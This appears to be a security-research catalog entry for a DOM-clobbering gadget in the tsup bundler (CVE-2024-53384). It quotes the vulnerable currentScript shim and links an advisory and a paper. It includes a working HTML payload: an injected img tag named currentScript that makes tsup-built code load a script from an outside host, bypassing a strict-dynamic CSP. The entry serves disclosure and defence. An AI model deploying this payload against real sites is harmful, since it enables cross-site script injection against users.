.. / tsup

Star Fork

The simplest and fastest way to bundle your TypeScript libraries.

≤8.3.4 | CVE-2024-53384

<img> @name @src 🛡️ strict-dynamic ⏱️ before-load

• Tsup was translating the import.meta.url to document.currentScript in cjs_shims.js to determine the URL of the current script.
  
  In the CVE advisory, it mentions version ≤8.3.4, but it looks to work in the latest version (8.5.0).

  <!-- user input -->
  <img name="currentScript" src="https://gmsgadget.com/assets/xss/index.js">
  
  <script nonce="secret" src="https://gmsgadget.com/assets/libs/tsup/index.js?"></script>

  Preview Copy

const getImportMetaUrl = () =>
  typeof document === 'undefined'
    ? new URL(`file:${__filename}`).href
    : (document.currentScript && document.currentScript.src) ||
      new URL('main.js', document.baseURI).href

export const importMetaUrl = /* @__PURE__ */ getImportMetaUrl()

Related links:

• https://github.com/advisories/GHSA-3mv9-4h5g-vhg3
• https://gist.github.com/jackfromeast/36f98bf7542d11835c883c1d175d9b92
• https://github.com/jackfromeast/dom-clobbering-collection/blob/main/domc-gadgets/tsup.md
• https://jackfromeast.github.io/assets/DOMinoEffect.pdf

Found by jackfromeast, ishmeals.

Source | History